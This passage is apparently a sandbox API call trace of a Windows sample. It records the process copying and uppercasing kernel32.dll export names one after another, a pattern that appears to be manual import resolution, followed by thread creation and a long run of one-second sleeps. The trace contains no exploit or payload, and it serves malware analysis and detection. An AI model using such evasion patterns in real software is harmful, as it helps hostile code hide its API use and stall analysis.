(lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.170] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.170] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.170] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.170] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.170] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.170] lstrlenA (lpString="COPYFILEA") returned 9 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.170] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.170] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.170] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.171] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.171] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.171] lstrlenA (lpString="COPYFILEW") returned 9 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.171] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.171] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.171] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.171] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.171] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.171] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.171] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.171] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.171] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.171] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.171] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.171] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.172] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.172] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.172] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.172] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.172] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.172] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.172] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.172] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.172] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.172] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.172] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.172] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.172] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.172] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.173] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.173] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0048.173] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0048.173] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0048.173] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0048.173] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0048.173] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0048.173] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0048.173] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0048.173] lstrlenA (lpString="CREATEJOBSET") returned 12 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0048.173] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0048.173] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0048.173] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0048.173] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0048.174] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0048.174] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0048.174] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0048.174] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0048.174] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0048.174] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0048.174] lstrlenA (lpString="CREATEPIPE") returned 10 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0048.174] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0048.174] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0048.174] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0048.174] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0048.174] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0048.174] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0048.174] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0048.174] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0048.175] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0048.175] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0048.175] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0048.175] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0048.175] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0048.175] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0048.175] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0048.175] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0048.175] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0048.175] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0048.175] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0048.175] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0048.175] lstrcpyA (in: lpString1=0x32df0d8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0048.175] lstrlenA (lpString="CREATETHREAD") returned 12 [0048.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9e760, lpParameter=0x370000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0048.214] Sleep (dwMilliseconds=0x3e8) [0049.723] Sleep (dwMilliseconds=0x3e8) [0051.449] Sleep (dwMilliseconds=0x3e8) [0052.910] Sleep (dwMilliseconds=0x3e8) [0053.918] Sleep (dwMilliseconds=0x3e8) [0054.994] Sleep (dwMilliseconds=0x3e8) [0056.237] Sleep (dwMilliseconds=0x3e8) [0057.359] Sleep (dwMilliseconds=0x3e8) [0058.374] Sleep (dwMilliseconds=0x3e8) [0059.587] Sleep (dwMilliseconds=0x3e8) [0060.650] Sleep (dwMilliseconds=0x3e8) [0061.737] Sleep (dwMilliseconds=0x3e8) [0062.939] Sleep (dwMilliseconds=0x3e8) [0063.952] Sleep (dwMilliseconds=0x3e8) [0065.187] Sleep (dwMilliseconds=0x3e8) [0066.224] Sleep (dwMilliseconds=0x3e8) [0067.339] Sleep (dwMilliseconds=0x3e8) [0068.343] Sleep (dwMilliseconds=0x3e8) [0069.390] Sleep (dwMilliseconds=0x3e8) [0070.680] Sleep (dwMilliseconds=0x3e8) [0071.720] Sleep (dwMilliseconds=0x3e8) [0072.789] Sleep (dwMilliseconds=0x3e8) [0073.843] Sleep (dwMilliseconds=0x3e8) [0074.846] Sleep (dwMilliseconds=0x3e8) [0075.913] Sleep (dwMilliseconds=0x3e8) [0076.983] Sleep (dwMilliseconds=0x3e8) [0078.013] Sleep (dwMilliseconds=0x3e8) [0079.057] Sleep (dwMilliseconds=0x3e8) [0080.087] Sleep (dwMilliseconds=0x3e8) [0081.122] Sleep (dwMilliseconds=0x3e8) [0082.131] Sleep (dwMilliseconds=0x3e8) [0083.162] Sleep (dwMilliseconds=0x3e8) [0084.174] Sleep (dwMilliseconds=0x3e8) [0085.188] Sleep (dwMilliseconds=0x3e8) [0086.234] Sleep (dwMilliseconds=0x3e8) [0087.282] Sleep (dwMilliseconds=0x3e8) [0088.296] Sleep (dwMilliseconds=0x3e8) [0089.307] Sleep (dwMilliseconds=0x3e8) [0090.344] Sleep (dwMilliseconds=0x3e8) [0092.543] lstrlenA (lpString="kernel32.dll") returned 12 [0092.543] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0092.544] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0092.544] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0092.544] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0092.544] lstrlenA (lpString="ADDATOMA") returned 8 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0092.544] lstrlenA (lpString="ADDATOMW") returned 8 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0092.544] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0092.544] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0092.544] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0092.544] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0092.544] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0092.544] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0092.544] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0092.544] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0092.544] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0092.544] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0092.544] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0092.544] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0092.545] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0092.545] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0092.545] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0092.545] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0092.545] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0092.545] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0092.545] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0092.545] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0092.545] lstrlenA (lpString="BACKUPREAD") returned 10 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0092.545] lstrlenA (lpString="BACKUPSEEK") returned 10 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0092.545] lstrlenA (lpString="BACKUPWRITE") returned 11 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0092.545] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0092.545] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0092.545] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0092.545] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0092.545] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0092.545] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0092.545] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0092.545] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0092.546] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0092.546] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0092.546] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0092.546] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0092.546] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0092.546] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0092.546] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0092.546] lstrcpyA (in: lpString1=0x32df0ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0092.546] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0092.546] lstrcpyA 